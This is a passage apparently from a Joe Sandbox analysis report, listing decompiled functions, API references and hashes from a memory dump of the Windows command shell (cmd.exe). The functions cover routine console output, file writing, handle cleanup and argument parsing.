										goto L26;
									}
									SetThreadLocale(0x409);
									L27:
									_t136 = _a12;
									goto L28;
								}
								_t76 = GetModuleHandleW(L"KERNEL32.DLL");
								_t137 =  *0xdad5f8; // 0x0
								 *0xdad0d0 = _t76;
								__eflags = _t76 - 0xffffffff;
								if(_t76 == 0xffffffff) {
									goto L69;
								}
								goto L67;
							}
							L26:
							 *0xdc94b4(0);
							_t137->i();
							goto L27;
						} else {
							_t83 = E00D8D7D4( *(_t136 + 0x38), 0x2a);
							__eflags = _t83;
							if(_t83 != 0) {
								goto L25;
							}
							_t39 = _t83 + 0x3f; // 0x3f
							_t84 = E00D8D7D4( *(_t136 + 0x38), _t39);
							__eflags = _t84;
							if(_t84 != 0) {
								goto L25;
							}
							_t131 = _a552;
							__eflags = _a552;
							if(__eflags == 0) {
								_t131 =  &_a32;
							}
							_t85 = E00D910B0(_t136, _t131, __eflags, _a560);
							__eflags = _t85 - 2;
							if(_t85 != 2) {
								goto L25;
							} else {
								__eflags =  *(_t136 + 0x34);
								if( *(_t136 + 0x34) == 0) {
									L61:
									_t86 = _a552;
									__eflags = _t86;
									if(__eflags == 0) {
										_t86 =  &_a32;
									}
									_t126 =  *_t102;
									_push(_t86);
									_push(_t102[1]);
									_t87 = E00D91F52(_t102, _t136,  *_t102, _t132, _t136, __eflags);
									__eflags = _t87;
									if(_t87 != 0) {
										goto L71;
									} else {
										_t136 = 0;
										_a12 = 1;
										_a8 = 0;
										goto L28;
									}
								} else {
									_t126 = _t136;
									_t88 = E00DA76C0(_a24, _t136);
									__eflags = _t88;
									if(_t88 != 0) {
										L71:
										__imp__??_V@YAXPAX@Z(_a544);
										_t140 = _t140 + 4;
										_t57 = 1;
										goto L32;
									}
									goto L61;
								}
							}
						}
					}
				} else {
					L41:
					_t136 = _a16;
					L29:
					if( *0xdc3cc4 != _t102) {
						L78:
						_t57 = _t136;
						goto L32;
					} else {
						_t132 = _a20;
						_t126 = _a24;
						L1:
						if( *0xdad544 != 0) {
							E00DA921A(_t102, _t132);
							_t126 = _a24;
						}
						 *0xdad590 = 0;
						if( *0xdc3cc9 == 0 || _t132 == 0) {
							goto L4;
						} else {
							goto L33;
						}
					}
				}
				L4:
				_t133 = E00D90662(_t102);
				if(_t133 == 0xffffffff) {
					goto L73;
				}
				_t59 = E00D8EEF0(3, _t133, _t102[4]);
				_t136 = _t59;
				__imp___tell(_t133);
				_t102[2] = _t59;
				_t142 = _t140 + 4;
				_t3 = _t133 - 3; // -3
				_t108 = 0;
				_t126 = _t133;
				if(_t3 > 0x5b) {
					L8:
					__imp___close(_t133);
					_t140 = _t142 + 4;
					if(_t136 == 0) {
						goto L41;
					}
					if(_t136 == 1 ||  *0xdbf980 == 0x234a) {
						E00DA82EB(_t108);
						__eflags =  *0xdad0c8 - 1;
						if( *0xdad0c8 == 1) {
							__eflags =  *0xdc8530;
							if( *0xdc8530 == 0) {
								E00DA6FF0(_t108);
								E00D8C108(_t108, 0x2371, 1, 0xdb3892);
								_t140 = _t140 + 0xc;
							}
						}
						E00DA9287(_t108);
						__imp__longjmp(0xdbb8b8, 1);
						goto L78;
					} else {
						if(_t136 == 0xffffffff) {
							_t57 = _a16;
							goto L32;
						} else {
							_t132 = _a20;
							_t126 = _a28;
							goto L13;
						}
					}
				}
				if(_t133 > 0x1f) {
					_t44 = _t133 - 0x20; // -32
					_t100 = 1 + (_t44 >> 5);
					__eflags = _t100;
					_t108 = _t100;
					do {
						_t126 = _t126 - 0x20;
						_t100 = _t100 - 1;
						__eflags = _t100;
					} while (_t100 != 0);
				}
				asm("btr eax, edx");
				goto L8;
			}

0x00d8e5a8
0x00d8e5a8
0x00d8e5a8
0x00d8e5a8
0x00d8e7ad
0x00d8e7b0
0x00d8e7b4
0x00000000
0x00000000
0x00d8e7c4
0x00d8e7c6
0x00d8e7c8
0x00d9bfc5
0x00d9bfc5
0x00d8e798
0x00d8e79f
0x00d8e7a0
0x00d8e7a1
0x00d8e7a2
0x00d8e7ac
0x00d8e7ac
0x00d8e7d3
0x00d8e7d9
0x00d8e7de
0x00d8e7e1
0x00d8e7e3
0x00000000
0x00000000
0x00d8e7f0
0x00d8e7f5
0x00d8e7f8
0x00d8e7fa
0x00000000
0x00000000
0x00d8e805
0x00d8e80a
0x00d8e80d
0x00d8e814
0x00d8e667
0x00d8e669
0x00d8e81d
0x00d8e81f
0x00d8e827
0x00d8e827
0x00d8e81f
0x00d8e66f
0x00d8e673
0x00d8e684
0x00d8e832
0x00d8e836
0x00d8e68a
0x00d8e691
0x00d8e693
0x00d8e89d
0x00d8e89f
0x00d8e8a2
0x00d9bebb
0x00d9bec2
0x00d9bec4
0x00d9beca
0x00d9becf
0x00d9bed3
0x00d9bedd
0x00d9bee2
0x00d9bee4
0x00d9bee4
0x00d9bec4
0x00d8e8a2
0x00d8e693
0x00d8e69c
0x00d8e846
0x00d8e846
0x00d8e6ab
0x00d8e6b9
0x00d8e6c1
0x00d8e6cc
0x00d8e6d1
0x00d8e6dc
0x00d9beec
0x00d8e6e2
0x00d8e6e2
0x00d8e6e2
0x00d8e6f3
0x00d9bfc0
0x00000000
0x00d8e6f9
0x00d8e6fb
0x00d9bef6
0x00d9bef8
0x00d8e76b
0x00d8e772
0x00d8e778
0x00000000
0x00d8e778
0x00d8e704
0x00d8e721
0x00d8e721
0x00d8e72d
0x00d8e731
0x00d8e736
0x00d8e742
0x00d8e747
0x00d8e74d
0x00d8e755
0x00d9bf4d
0x00d9bf52
0x00d9bf55
0x00d9bf72
0x00d9bf72
0x00d9bf74
0x00d9bf82
0x00d9bf84
0x00d9bf84
0x00d9bf8a
0x00d9bf8a
0x00d9bf8c
0x00000000
0x00000000
0x00d9bf97
0x00d8e767
0x00d8e767
0x00000000
0x00d8e767
0x00d9bf5c
0x00d9bf62
0x00d9bf68
0x00d9bf6d
0x00d9bf70
0x00000000
0x00000000
0x00000000
0x00d9bf70
0x00d8e75b
0x00d8e75f
0x00d8e765
0x00000000
0x00d8e84e
0x00d8e856
0x00d8e85b
0x00d8e85d
0x00000000
0x00000000
0x00d8e866
0x00d8e869
0x00d8e86e
0x00d8e870
0x00000000
0x00000000
0x00d8e876
0x00d8e87d
0x00d8e87f
0x00d8e8ad
0x00d8e8ad
0x00d8e88a
0x00d8e88f
0x00d8e892
0x00000000
0x00d8e898
0x00d9bf01
0x00d9bf05
0x00d9bf1a
0x00d9bf1a
0x00d9bf21
0x00d9bf23
0x00d9bf25
0x00d9bf25
0x00d9bf29
0x00d9bf2d
0x00d9bf2e
0x00d9bf31
0x00d9bf36
0x00d9bf38
0x00000000
0x00d9bf3a
0x00d9bf3a
0x00d9bf3c
0x00d9bf44
0x00000000
0x00d9bf44
0x00d9bf07
0x00d9bf0b
0x00d9bf0d
0x00d9bf12
0x00d9bf14
0x00d9bfa2
0x00d9bfa9
0x00d9bfaf
0x00d9bfb2
0x00000000
0x00d9bfb2
0x00000000
0x00d9bf14
0x00d9bf05
0x00d8e892
0x00d8e704
0x00d8e83d
0x00d8e83d
0x00d8e83d
0x00d8e77b
0x00d8e781
0x00d9c011
0x00d9c011
0x00000000
0x00d8e787
0x00d8e787
0x00d8e78b
0x00d8e5b0
0x00d8e5b7
0x00d9be97
0x00d9be9c
0x00d9be9c
0x00d8e5c4
0x00d8e5cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8e5cb
0x00d8e781
0x00d8e5d5
0x00d8e5dc
0x00d8e5e1
0x00000000
0x00000000
0x00d8e5f1
0x00d8e5f7
0x00d8e5f9
0x00d8e5ff
0x00d8e602
0x00d8e605
0x00d8e608
0x00d8e60a
0x00d8e60f
0x00d8e62b
0x00d8e62c
0x00d8e632
0x00d8e637
0x00000000
0x00000000
0x00d8e640
0x00d9bfcf
0x00d9bfd4
0x00d9bfdb
0x00d9bfdd
0x00d9bfe4
0x00d9bfe6
0x00d9bff7
0x00d9bffc
0x00d9bffc
0x00d9bfe4
0x00d9bfff
0x00d9c00b
0x00000000
0x00d8e656
0x00d8e659
0x00d8e794
0x00000000
0x00d8e65f
0x00d8e65f
0x00d8e663
0x00000000
0x00d8e663
0x00d8e659
0x00d8e640
0x00d8e614
0x00d9bea5
0x00d9beab
0x00d9beab
0x00d9beac
0x00d9beae
0x00d9beae
0x00d9beb1
0x00d9beb1
0x00d9beb1
0x00d9beb6
0x00d8e621
0x00000000

APIs

_tell.MSVCRT ref: 00D8E5F9
_close.MSVCRT ref: 00D8E62C
memset.MSVCRT ref: 00D8E6CC
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00D8E736
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00DB3840), ref: 00D8E747
??_V@YAXPAX@Z.MSVCRT ref: 00D8E772

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleInfoOutput_close_tellmemset
String ID:
API String ID: 1380661413-0
Opcode ID: 4ca655463aa13fcea4fd294e47bf957e4fe8d0e6747ec0826b16292f36395990
Instruction ID: 9174b639aa3dcc52e7447424c4985967b48f0dc3a654facc59fe277b63e3f165
Opcode Fuzzy Hash: 4ca655463aa13fcea4fd294e47bf957e4fe8d0e6747ec0826b16292f36395990
Instruction Fuzzy Hash: 7641C2709043418BDB24AF18E84872AB7E6AF85714F19052DE856D73E1EB349C45CF72

Uniqueness

Uniqueness Score: -1.00%

Function 00D92616, Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00D92616(long __ecx, DWORD* __edx) {
				void _v8;
				void* _t4;
				long _t5;
				int _t21;
				long _t43;

				_push(__ecx);
				_t40 = __edx;
				_t43 = 0;
				if(__edx <= 0) {
					L5:
					_t5 = _t43;
					L6:
					return _t5;
				}
				if(E00D9269C(_t4) != 0) {
					__imp__AcquireSRWLockShared(0xdc7f20);
					_t7 =  &_v8;
					__imp___get_osfhandle(0);
					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
					if(_t21 == 0) {
						_t43 = GetLastError();
					}
					__imp__ReleaseSRWLockShared(0xdc7f20);
				} else {
					_t40 = __edx + __edx;
					_t21 = E00D927C8( &_v8, __ecx, _t40,  &_v8);
				}
				if(_t21 == 0 || _v8 != _t40) {
					_t43 = GetLastError();
					if(_t43 == 0) {
						_t43 = 0x70;
					}
					if(E00D90178(_t10) == 0) {
						if(E00DA9953(_t11, 1) == 0) {
							E00DA985A(_t43);
						} else {
							_push(0);
							_push(0x2364);
							E00D8C5A2(1);
						}
						_t5 = 1;
						goto L6;
					} else {
						_push(0);
						_push(0x1d);
						E00D8C5A2(1);
						goto L5;
					}
				} else {
					goto L5;
				}
			}

0x00d9261b
0x00d9261f
0x00d92621
0x00d92627
0x00d92659
0x00d92659
0x00d9265b
0x00d92661
0x00d92661
0x00d92633
0x00d92667
0x00d9266f
0x00d92677
0x00d92685
0x00d92689
0x00d9d681
0x00d9d681
0x00d92694
0x00d92635
0x00d92638
0x00d92646
0x00d92646
0x00d9264a
0x00d9d68e
0x00d9d692
0x00d9d696
0x00d9d696
0x00d9d6a3
0x00d9d6be
0x00d9d6d2
0x00d9d6c0
0x00d9d6c0
0x00d9d6c2
0x00d9d6c7
0x00d9d6cd
0x00d9d6d7
0x00000000
0x00d9d6a5
0x00d9d6a5
0x00d9d6a7
0x00d9d6a9
0x00000000
0x00d9d6af
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00D9269C: _get_osfhandle.MSVCRT ref: 00D926A7
Part of subcall function 00D9269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D8C5F8,?,?,?), ref: 00D926B6
Part of subcall function 00D9269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926D2
Part of subcall function 00D9269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000002), ref: 00D926E1
Part of subcall function 00D9269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D926EC
Part of subcall function 00D9269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926F5

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000000,?,?,00DBB980,00000002,00000000,?,00D99CA6,%s %s ,?,00000000,00000000), ref: 00D92667
_get_osfhandle.MSVCRT ref: 00D92677
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D99CA6,%s %s ,?,00000000,00000000), ref: 00D9267F
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00D92694

Part of subcall function 00D927C8: _get_osfhandle.MSVCRT ref: 00D927DB
Part of subcall function 00D927C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DBB980,000000FF,00DAD620,00002000,00000000,00000000), ref: 00D9281C
Part of subcall function 00D927C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00DAD620,-00000001,?,00000000), ref: 00D92831

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
String ID:
API String ID: 4057327938-0
Opcode ID: ff3cdd170b2b6c6da10d7b9116b6c7a479e4248569752e42076aeb71daa5ac90
Instruction ID: 0d0643015a6a6245a7b0be55aae112ea21ceb454da8ba7767fc4b98c29fd0c60
Opcode Fuzzy Hash: ff3cdd170b2b6c6da10d7b9116b6c7a479e4248569752e42076aeb71daa5ac90
Instruction Fuzzy Hash: AD21D532744307BBDF246AF96C9AF7A769DCB85751F24013DFA4AD6281DE60DC004674

Uniqueness

Uniqueness Score: -1.00%

Function 00D927C8, Relevance: 9.1, APIs: 6, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00D927C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
				void* _v8;
				long _v12;
				long _v16;
				long _t15;
				void* _t17;
				void* _t24;
				DWORD* _t29;
				long _t31;
				long _t32;

				_t31 = _a4;
				_t23 = __edx;
				_v16 = _t31;
				__imp___get_osfhandle(_t24);
				_v8 = __eax;
				if( *0xdc805c != 0) {
					return WriteFile(__eax, __edx, _t31, _a8, 0);
				}
				_t29 = _a8;
				while(_t31 > 0x2000) {
					_t15 = WideCharToMultiByte( *0xdb3854, 0, _t23, 0x1000, 0xdad620, 0x2000, 0, 0);
					_v12 = _t15;
					_t23 =  &(_t23[0x1000]);
					_t31 = _t31 - 0x2000;
					if(WriteFile(_v8, 0xdad620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
						L9:
						_t17 = 0;
						L7:
						return _t17;
					} else {
						continue;
					}
				}
				if(_t31 == 0) {
					L6:
					 *_t29 = _v16;
					_t17 = 1;
					goto L7;
				}
				_t5 = WideCharToMultiByte( *0xdb3854, 0, _t23, 0xffffffff, 0xdad620, 0x2000, 0, 0) - 1; // -1
				_t32 = _t5;
				if(WriteFile(_v8, 0xdad620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
					goto L9;
				} else {
					goto L6;
				}
			}

0x00d927d2
0x00d927d5
0x00d927d8
0x00d927db
0x00d927e9
0x00d927ec
0x00000000
0x00d9d70d
0x00d927f3
0x00d927f6
0x00d9d730
0x00d9d747
0x00d9d74a
0x00d9d74c
0x00d9d756
0x00d92850
0x00d92850
0x00d92847
0x00000000
0x00d9d767
0x00000000
0x00d9d767
0x00d9d756
0x00d92805
0x00d9283f
0x00d92842
0x00d92846
0x00000000
0x00d92846
0x00d92825
0x00d92825
0x00d92839
0x00000000
0x00000000
0x00000000
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 00D927DB
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DBB980,000000FF,00DAD620,00002000,00000000,00000000), ref: 00D9281C
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00DAD620,-00000001,?,00000000), ref: 00D92831
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DBB980,?,?,00000000), ref: 00D9D70D
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DBB980,00001000,00DAD620,00002000,00000000,00000000,00000000), ref: 00D9D730
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00DAD620,00000000,?,00000000), ref: 00D9D74E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
String ID:
API String ID: 3249344982-0
Opcode ID: e087f9cc75fa143e125c39756a0c8c7bd05419f3a0804926a03b433bbb246162
Instruction ID: d1f3d1b38edb0d73035b547cb3c4d299a937cc96641250700738d786f35b1148
Opcode Fuzzy Hash: e087f9cc75fa143e125c39756a0c8c7bd05419f3a0804926a03b433bbb246162
Instruction Fuzzy Hash: 8C21AF71A44306FBEF204FA49C09F7ABBA9EB09750F244125F945E72D0D6709D01DBB9

Uniqueness

Uniqueness Score: -1.00%

Function 00DA265F, Relevance: 9.1, APIs: 6, Instructions: 82
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00DA265F(int* __ecx) {
				void** _v0;
				void* _v8;
				int _t18;
				void** _t29;
				void** _t32;
				void* _t39;
				void* _t42;

				_push(__ecx);
				_t39 = __ecx;
				_t2 = _t39 + 4; // 0x4
				_t29 = _t2;
				_t32 = _t29;
				E00DA2D6D(_t32,  &_v8);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t42 = _v8;
					goto L18;
				} else {
					_t33 = __ecx[2];
					if(__ecx[2] != 0) {
						E00DA2DB4(_t33);
					}
					_t42 = 0;
					 *(_t39 + 8) = 0;
					_t34 =  *(_t39 + 0xc);
					if( *(_t39 + 0xc) != 0) {
						E00DA2DB4(_t34);
					}
					_t35 = _v8;
					 *(_t39 + 0xc) = _t42;
					if(_v8 != 0) {
						E00DA2DE9(_t35);
					}
					_t18 = E00DA25D6(_t35);
					if(_t18 == 0) {
						_t8 = _t39 + 0x18; // 0x18
						_t32 = _t8;
						E00DA170A(_t32);
						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
							L10:
							_push(_t32);
							L11:
							_t32 = _v0;
							E00DA2D56();
						}
						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
							goto L10;
						}
						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
							goto L10;
						}
						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
						L18:
						if(_t42 != 0) {
							_t18 = ReleaseMutex(_t42);
							if(_t18 == 0) {
								_push(_t32);
								goto L11;
							}
						}
					}
				}
				return _t18;
			}

0x00da2664
0x00da2668
0x00da2670
0x00da2670
0x00da2674
0x00da2676
0x00da267d
0x00da2680
0x00da2682
0x00da2718
0x00000000
0x00da2688
0x00da2688
0x00da268d
0x00da268f
0x00da268f
0x00da2694
0x00da2696
0x00da2699
0x00da269e
0x00da26a0
0x00da26a0
0x00da26a5
0x00da26a8
0x00da26ad
0x00da26af
0x00da26af
0x00da26b4
0x00da26bb
0x00da26bd
0x00da26bd
0x00da26c0
0x00da26c8
0x00da26d7
0x00da26d7
0x00da26dd
0x00da26dd
0x00da26e0
0x00da26e0
0x00da26e8
0x00000000
0x00000000
0x00da26f9
0x00000000
0x00000000
0x00da2710
0x00da271b
0x00da271d
0x00da2720
0x00da2728
0x00da272a
0x00000000
0x00da272b
0x00da2728
0x00da271d
0x00da26bb
0x00da2738

APIs

Part of subcall function 00DA2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,00DA1838,?), ref: 00DA2D7C

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 00DA26CD

Part of subcall function 00DA2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,00DA26A5,?), ref: 00DA2DBD
Part of subcall function 00DA2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,00DA26A5,?), ref: 00DA2DC6
Part of subcall function 00DA2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00DA26A5,?), ref: 00DA2DDF

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DA26ED
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DA26FD
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 00DA2709
RtlFreeHeap.NTDLL(00000000), ref: 00DA2710
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 00DA2720

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
String ID:
API String ID: 2383944720-0
Opcode ID: 43b8241ba794dbcf497328a875b1bed661300931a43df709b7c6b820aec3ad74
Instruction ID: 6890db92d1177f75c58022210bd814db656331feb1a290ce4551809d441e5abb
Opcode Fuzzy Hash: 43b8241ba794dbcf497328a875b1bed661300931a43df709b7c6b820aec3ad74
Instruction Fuzzy Hash: 57218C31602617EB8F25AF6BD859E7AF768FF4271171C8229E85582610DB30ED10CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

_wcsicmp.MSVCRT ref: 00DA6EFC
_wcsicmp.MSVCRT ref: 00DA6F1B
_wcsicmp.MSVCRT ref: 00DA6F41

Strings

LIST, xrefs: 00DA6F3B
KEYS, xrefs: 00DA6F2F
OFF, xrefs: 00DA6F14, 00DA6F19

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmpwcschr$iswspace
String ID: KEYS$LIST$OFF
API String ID: 3924973218-4129271751
Opcode ID: 22a4a433b15ddcd208ca633e8523c0e2c40b7707e6d627e5a78d657a64a1f678
Instruction ID: a926ad4784059d970146701ed920f7bd6c82f55e94be829d9ff6c58404cdf476
Opcode Fuzzy Hash: 22a4a433b15ddcd208ca633e8523c0e2c40b7707e6d627e5a78d657a64a1f678
Instruction Fuzzy Hash: C6110A31208702DEA7187726AC5AC27B3A8EFC6B6436DC01EF546862C1EE71DE018B75

Uniqueness

Uniqueness Score: -1.00%

Function 00D96CE1, Relevance: 9.1, APIs: 6, Instructions: 79
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00D96CE1(void* __eax) {
				void** _v0;
				void* _v8;
				int _t19;
				void** _t30;
				void* _t32;
				void** _t33;
				void* _t40;
				void* _t43;

				_t32 =  *0xdad010; // 0x0
				if(_t32 != 0) {
					_push(_t32);
					_t40 = _t32;
					_t2 = _t40 + 4; // 0x4
					_t30 = _t2;
					_t33 = _t30;
					E00DA2D6D(_t33,  &_v8);
					_t19 =  *_t40 - 1;
					 *_t40 = _t19;
					if(_t19 != 0) {
						_t43 = _v8;
						goto L20;
					} else {
						_t34 =  *(_t40 + 8);
						if( *(_t40 + 8) != 0) {
							E00DA2DB4(_t34);
						}
						_t43 = 0;
						 *(_t40 + 8) = 0;
						_t35 =  *(_t40 + 0xc);
						if( *(_t40 + 0xc) != 0) {
							E00DA2DB4(_t35);
						}
						_t36 = _v8;
						 *(_t40 + 0xc) = _t43;
						if(_v8 != 0) {
							E00DA2DE9(_t36);
						}
						_t19 = E00DA25D6(_t36);
						if(_t19 == 0) {
							_t8 = _t40 + 0x18; // 0x18
							_t33 = _t8;
							E00DA170A(_t33);
							if( *(_t40 + 0xc) != _t43 && CloseHandle( *(_t40 + 0xc)) == 0) {
								L12:
								_push(_t33);
								L13:
								_t33 = _v0;
								E00DA2D56();
							}
							if( *(_t40 + 8) != _t43 && CloseHandle( *(_t40 + 8)) == 0) {
								goto L12;
							}
							if( *_t30 != _t43 && CloseHandle( *_t30) == 0) {
								goto L12;
							}
							_t19 = RtlFreeHeap(GetProcessHeap(), _t43, _t40);
							L20:
							if(_t43 != 0) {
								_t19 = ReleaseMutex(_t43);
								if(_t19 == 0) {
									_push(_t33);
									goto L13;
								}
							}
						}
					}
					return _t19;
				} else {
					return __eax;
				}
			}

0x00d96ce1
0x00d96ce9
0x00da2664
0x00da2668
0x00da2670
0x00da2670
0x00da2674
0x00da2676
0x00da267d
0x00da2680
0x00da2682
0x00da2718
0x00000000
0x00da2688
0x00da2688
0x00da268d
0x00da268f
0x00da268f
0x00da2694
0x00da2696
0x00da2699
0x00da269e
0x00da26a0
0x00da26a0
0x00da26a5
0x00da26a8
0x00da26ad
0x00da26af
0x00da26af
0x00da26b4
0x00da26bb
0x00da26bd
0x00da26bd
0x00da26c0
0x00da26c8
0x00da26d7
0x00da26d7
0x00da26dd
0x00da26dd
0x00da26e0
0x00da26e0
0x00da26e8
0x00000000
0x00000000
0x00da26f9
0x00000000
0x00000000
0x00da2710
0x00da271b
0x00da271d
0x00da2720
0x00da2728
0x00da272a
0x00000000
0x00da272b
0x00da2728
0x00da271d
0x00da26bb
0x00da2738
0x00d96cef
0x00d96cef
0x00d96cef

APIs

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 00DA26CD
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DA26ED
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DA26FD
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 00DA2709
RtlFreeHeap.NTDLL(00000000), ref: 00DA2710
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 00DA2720

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseHandle$Heap$FreeMutexProcessRelease
String ID:
API String ID: 1689195821-0
Opcode ID: 63240fac9cb19b69fee558caae999188bbb3b51bbc552b1b275463d2c7dcc3f2
Instruction ID: 4a1307f5dc20fcc942c13186c82a1c48e457e7630bb1dab47ddb1183015a65ac
Opcode Fuzzy Hash: 63240fac9cb19b69fee558caae999188bbb3b51bbc552b1b275463d2c7dcc3f2
Instruction Fuzzy Hash: 6F215C30202603ABDF29AB6BD859E7AB769FF56B0071C8129E85582651DB30DD10CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D90178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00D90183
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9D6A1), ref: 00D9018D
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D901B8
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000001), ref: 00D901C7
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D901D2
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00D901DB

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

